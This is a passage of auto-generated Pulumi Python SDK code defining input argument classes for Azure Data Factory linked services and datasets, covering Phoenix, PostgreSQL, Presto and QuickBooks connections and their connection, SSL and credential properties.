if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if use_system_trust_store is not None:
pulumi.set(__self__, "use_system_trust_store", use_system_trust_store)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication mechanism used to connect to the Phoenix server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
The IP address or host name of the Phoenix server (e.g. 192.168.222.160).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowHostNameCNMismatch")
def allow_host_name_cn_mismatch(self) -> Optional[Any]:
"""
Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
"""
return pulumi.get(self, "allow_host_name_cn_mismatch")
@allow_host_name_cn_mismatch.setter
def allow_host_name_cn_mismatch(self, value: Optional[Any]):
pulumi.set(self, "allow_host_name_cn_mismatch", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false.
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false.
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="httpPath")
def http_path(self) -> Optional[Any]:
"""
The partial URL corresponding to the Phoenix server (e.g. /gateway/sandbox/phoenix/version). The default value is hbasephoenix if using WindowsAzureHDInsightService.
"""
return pulumi.get(self, "http_path")
@http_path.setter
def http_path(self, value: Optional[Any]):
pulumi.set(self, "http_path", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port that the Phoenix server uses to listen for client connections. The default value is 8765.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter(name="useSystemTrustStore")
def use_system_trust_store(self) -> Optional[Any]:
"""
Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
return pulumi.get(self, "use_system_trust_store")
@use_system_trust_store.setter
def use_system_trust_store(self, value: Optional[Any]):
pulumi.set(self, "use_system_trust_store", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name used to connect to the Phoenix server.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class PhoenixObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Phoenix server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'PhoenixObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class PipelineReferenceArgs:
def __init__(__self__, *,
reference_name: pulumi.Input[str],
type: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
Pipeline reference type.
:param pulumi.Input[str] reference_name: Reference pipeline name.
:param pulumi.Input[str] type: Pipeline reference type.
:param pulumi.Input[str] name: Reference name.
"""
pulumi.set(__self__, "reference_name", reference_name)
pulumi.set(__self__, "type", type)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="referenceName")
def reference_name(self) -> pulumi.Input[str]:
"""
Reference pipeline name.
"""
return pulumi.get(self, "reference_name")
@reference_name.setter
def reference_name(self, value: pulumi.Input[str]):
pulumi.set(self, "reference_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Pipeline reference type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Reference name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class PostgreSqlLinkedServiceArgs:
def __init__(__self__, *,
connection_string: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Linked service for PostgreSQL data source.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] connection_string: The connection string.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'PostgreSql')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The connection string.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class PrestoLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
catalog: Any,
host: Any,
server_version: Any,
type: pulumi.Input[str],
allow_host_name_cn_mismatch: Optional[Any] = None,
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
time_zone_id: Optional[Any] = None,
trusted_cert_path: Optional[Any] = None,
use_system_trust_store: Optional[Any] = None,
username: Optional[Any] = None):
"""
Presto server linked service.
:param pulumi.Input[str] authentication_type: The authentication mechanism used to connect to the Presto server.
:param Any catalog: The catalog context for all requests against the server.
:param Any host: The IP address or host name of the Presto server (e.g. 192.168.222.160).
:param Any server_version: The version of the Presto server (e.g. 0.148-t).
:param pulumi.Input[str] type: Type of linked service.
:param Any allow_host_name_cn_mismatch: Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name.
:param Any port: The TCP port that the Presto server uses to listen for client connections. The default value is 8080.
:param Any time_zone_id: The local time zone used by the connection. Valid values for this option are specified in the IANA Time Zone Database. The default value is the system time zone.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any use_system_trust_store: Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
:param Any username: The user name used to connect to the Presto server.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "catalog", catalog)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "server_version", server_version)
pulumi.set(__self__, "type", 'Presto')
if allow_host_name_cn_mismatch is not None:
pulumi.set(__self__, "allow_host_name_cn_mismatch", allow_host_name_cn_mismatch)
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if time_zone_id is not None:
pulumi.set(__self__, "time_zone_id", time_zone_id)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if use_system_trust_store is not None:
pulumi.set(__self__, "use_system_trust_store", use_system_trust_store)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication mechanism used to connect to the Presto server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def catalog(self) -> Any:
"""
The catalog context for all requests against the server.
"""
return pulumi.get(self, "catalog")
@catalog.setter
def catalog(self, value: Any):
pulumi.set(self, "catalog", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
The IP address or host name of the Presto server (e.g. 192.168.222.160).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter(name="serverVersion")
def server_version(self) -> Any:
"""
The version of the Presto server (e.g. 0.148-t).
"""
return pulumi.get(self, "server_version")
@server_version.setter
def server_version(self, value: Any):
pulumi.set(self, "server_version", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowHostNameCNMismatch")
def allow_host_name_cn_mismatch(self) -> Optional[Any]:
"""
Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
"""
return pulumi.get(self, "allow_host_name_cn_mismatch")
@allow_host_name_cn_mismatch.setter
def allow_host_name_cn_mismatch(self, value: Optional[Any]):
pulumi.set(self, "allow_host_name_cn_mismatch", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false.
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false.
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port that the Presto server uses to listen for client connections. The default value is 8080.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="timeZoneID")
def time_zone_id(self) -> Optional[Any]:
"""
The local time zone used by the connection. Valid values for this option are specified in the IANA Time Zone Database. The default value is the system time zone.
"""
return pulumi.get(self, "time_zone_id")
@time_zone_id.setter
def time_zone_id(self, value: Optional[Any]):
pulumi.set(self, "time_zone_id", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter(name="useSystemTrustStore")
def use_system_trust_store(self) -> Optional[Any]:
"""
Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
return pulumi.get(self, "use_system_trust_store")
@use_system_trust_store.setter
def use_system_trust_store(self, value: Optional[Any]):
pulumi.set(self, "use_system_trust_store", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name used to connect to the Presto server.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class PrestoObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Presto server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'PrestoObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class QuickBooksLinkedServiceArgs:
def __init__(__self__, *,
access_token: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
access_token_secret: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
company_id: Any,
consumer_key: Any,
consumer_secret: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
endpoint: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None):
"""
QuickBooks server linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token: The access token for OAuth 1.0 authentication.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token_secret: The access token secret for OAuth 1.0 authentication.
:param Any company_id: The company ID of the QuickBooks company to authorize.
:param Any consumer_key: The consumer key for OAuth 1.0 authentication.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] consumer_secret: The consumer secret for OAuth 1.0 authentication.
:param Any endpoint: The endpoint of the QuickBooks server. (e.g. quickbooks.api.intuit.com)
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
pulumi.set(__self__, "access_token", access_token)
pulumi.set(__self__, "access_token_secret", access_token_secret)
pulumi.set(__self__, "company_id", company_id)
pulumi.set(__self__, "consumer_key", consumer_key)
pulumi.set(__self__, "consumer_secret", consumer_secret)
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "type", 'QuickBooks')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
@property
@pulumi.getter(name="accessToken")
def access_token(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The access token for OAuth 1.0 authentication.
"""
return pulumi.get(self, "access_token")
@access_token.setter
def access_token(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "access_token", value)
@property
@pulumi.getter(name="accessTokenSecret")
def access_token_secret(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The access token secret for OAuth 1.0 authentication.
"""
return pulumi.get(self, "access_token_secret")
@access_token_secret.setter
def access_token_secret(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "access_token_secret", value)
@property
@pulumi.getter(name="companyId")
def company_id(self) -> Any:
"""
The company ID of the QuickBooks company to authorize.
"""
return pulumi.get(self, "company_id")
@company_id.setter
def company_id(self, value: Any):
pulumi.set(self, "company_id", value)
@property
@pulumi.getter(name="consumerKey")
def consumer_key(self) -> Any:
"""
The consumer key for OAuth 1.0 authentication.
"""
return pulumi.get(self, "consumer_key")
@consumer_key.setter
def consumer_key(self, value: Any):
pulumi.set(self, "consumer_key", value)
@property
@pulumi.getter(name="consumerSecret")
def consumer_secret(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The consumer secret for OAuth 1.0 authentication.
"""
return pulumi.get(self, "consumer_secret")
@consumer_secret.setter
